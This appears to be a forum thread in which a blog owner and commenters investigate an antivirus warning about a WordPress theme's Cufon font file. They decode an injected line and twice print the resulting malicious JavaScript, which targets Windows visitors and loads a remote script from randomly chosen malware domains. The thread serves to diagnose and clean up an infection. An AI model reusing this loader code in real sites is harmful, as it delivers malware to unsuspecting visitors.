
From AVG:

wp_content/themes/LightBright/js/League_Gothic_400.font.js

Exploit link to exploit site

edit: FF 3.6.8 on Windows - AVG 9




Browser? OS? Someone said this on Twitter to ericries after he retweeted another article of mine. I looked this weekend/had others ask if they got a warning. Everyone said it was fine. Looking at the .js file now (it's some Cufon thing) and the source of the post as well. It's part of what I'm using with elegantthemes.

Update: http://pastebin.com/UNijfWPu is everything contained in the file mentioned (League_Gothic_400.font.js)


There is an exploit in the first line.

document.write(unescape(...gibberish...))

That writes a script tag into the document with the following payload:

var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()*doms.length); var pref = Math.floor(Math.random()*preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };

I'm thinking that this is malicious (a cursory search for emapis.org shows it to be a malware site).

I'm not super familiar with Cufon, but this does not appear to be kosher.

Here is a link that may prove useful http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpre...


Here is the unescaped version of what it is doing:

<script>var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()*doms.length); var pref = Math.floor(Math.random()*preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };</script>


I bet it is emapis. org, see:

http://www.urlvoid.com/scan/emapis.org

As the unescaped javascript shows, it's a random chance for different sites, so it might be somewhat hard to reproduce. So far I haven't been able to pull a mootools.js from those sites to see it.

Edit: the js I'm getting back is just (function(){var error = 404;})();

Also, with regards to your site, here is the google safebrowse: http://www.google.com/safebrowsing/diagnostic?site=jasonlbap...

It shows that you also had stuff going to smartenergymodel[.]com, which is also listed on that unmaskparasites link that everyone is passing around.


Yeah, dealt with the smartenergymodel thing. Google hasn't updated that yet. This seems to be related to a lot of Mediatemple happenings.


Is that link off the server directly or via a webserver?

Edit: Searching for 'emapis.org' (from jacquesm's comment) gets me http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpre... in Google. It's old, but I suspect something similar at work.


Webserver directly. Let me see if elegantthemes has updated it. I'm trying to get rid of the junk that, when unescaped, has the problem.


Virus warning specifically suggests the Cufon font file contains a link to a compromised site.



